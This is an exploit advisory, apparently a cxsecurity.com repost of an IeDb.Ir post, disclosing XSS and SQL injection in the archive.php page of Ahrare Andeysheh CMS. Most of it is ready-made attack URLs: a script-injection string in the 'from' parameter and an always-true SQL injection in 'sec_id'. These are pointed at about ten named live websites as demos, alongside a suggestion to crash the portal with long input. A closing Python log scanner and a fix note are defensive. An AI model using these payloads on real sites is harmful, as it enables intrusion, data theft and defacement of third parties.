Ahrare Andeysheh Cms Multiple Vulnerabilities

2016.04.17
Credit: IeDb.Ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89

#####################################
# Iranian Exploit DataBase
# Ahrare Andeysheh Cms Multiple Vulnerabilities
# Vulnerability : Xss & Sql Injection & Poc
# Vulnerability on : archive.php
# Version : All Versions
# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg
# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg
# Vendor site : http://www.ahrareandeysheh.com/
# Author : IeDb.Ir
# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir
# Vulnerability attack information site : http://xssed.Ir/
# Archive Exploit = http://kkli.ir/aOFh6
#####################################

# Bug : [Xss And Sql Injection] to from=1395/01/01
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01[Xss&Sql]&to=1395/01/26&sec_id=99999999

Poc :
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=[Poc]
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--

# Dem0 [ Xss And Sqli]
http://enghelab-news.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://smquran.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://sabernews.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.tabatabaey.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://atabe.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.dorplast.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.nedanews.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.ahrareandeysheh.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999

Demo [Poc]
http://www.jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999') oR 5967562=5967562--
Insert Java code or very long input and disrupt the system, and this portal will be unavailable.

# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg
# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg
#####################################
Tnks To : All Member In Iedb.ir And Iedb.ir/acc
B3hz4d - C0dex - Mr.time - Bl4ck M4n - Mahdi-x - Khashayar - Iedb - AliTn - Sinizian Man - one alone hacker - Dr.Koders - b3hz4d4 Medrik - Security - Net.Hun73r - Tak.Fanar And All Member In Iedb Forum
#####################################
# Archive Exploit = http://iedb.ir/exploits-5061.html
#####################################
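Both injection points the advisory names sit in archive.php query parameters (the `from` date for XSS, `sec_id` for SQL injection), so a defender can spot attempts in web-server access logs by checking each parameter against the shape its legitimate values take. This is an added example, not code from the advisory or the CMS: the parameter allow-list is inferred from the PoC URLs, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Expected shape of each archive.php parameter, inferred from the advisory's PoC
# URLs (integer ids/paging, YYYY/MM/DD Jalali dates). This allow-list is an
# assumption made for the example; the CMS source is not on the page.
INT, DATE = re.compile(r"^-?\d+$"), re.compile(r"^\d{4}/\d{2}/\d{2}$")
PARAM_RULES = {"startrec": INT, "service_id": INT, "cat_id": INT, "rpp": INT,
               "sec_id": INT, "from": DATE, "to": DATE}

def suspicious_params(url):
    """{param: decoded value} for archive.php parameters that are unknown or
    malformed; {} for any other path."""
    parts = urlsplit(url)
    if not parts.path.endswith("/archive.php"):
        return {}
    bad = {}
    # parse_qs percent-decodes, so the check sees the same value the CMS would
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        rule = PARAM_RULES.get(name)
        for value in values:
            if rule is None or not rule.match(value):
                bad[name] = value
    return bad

# Combined-format access log lines, constructed for this example (not real
# traffic); the request targets mirror the advisory's PoC query strings.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2016:10:00:00 +0430] "GET /archive.php?startrec=2'
    '&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=5 HTTP/1.1" 200 4821',
    '203.0.113.9 - - [17/Apr/2016:10:00:07 +0430] "GET /archive.php?startrec=2&service_id=-1'
    '&cat_id=-1&rpp=20&from=1395/01/01%27%22%3E%3Cscript%3E&to=1395/01/26&sec_id=99999999 HTTP/1.1" 200 5102',
    '203.0.113.9 - - [17/Apr/2016:10:00:12 +0430] "GET /archive.php?startrec=2&service_id=-1'
    '&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999%27)%20oR%205967562=5967562-- HTTP/1.1" 200 9820',
    '198.51.100.2 - - [17/Apr/2016:10:01:00 +0430] "GET /index.php HTTP/1.1" 200 1200',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) ')

def scan_access_log(lines):
    """Return [(client_ip, bad_params), ...] for requests failing validation."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            bad = suspicious_params("http://host" + m.group(2))
            if bad:
                hits.append((m.group(1), bad))
    return hits
```

The same schema check, applied server-side before the values reach the SQL query or the page template, is the fix the advisory implies: reject anything that is not an integer or a date, and bind the survivors as parameters rather than concatenating them.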

References:

http://up.iedb.ir/uploads/ahrar-bug1.jpg
http://up.iedb.ir/uploads/ahrar-bug2.jpg


Copyright 2024, cxsecurity.com
